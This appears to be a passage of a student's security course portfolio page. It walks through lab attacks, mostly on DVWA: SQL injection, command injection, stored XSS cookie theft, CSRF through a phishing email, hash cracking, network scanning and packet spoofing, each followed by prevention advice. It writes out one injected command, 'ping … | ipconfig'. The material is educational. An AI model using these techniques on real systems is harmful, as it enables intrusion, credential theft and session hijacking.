          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
           <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
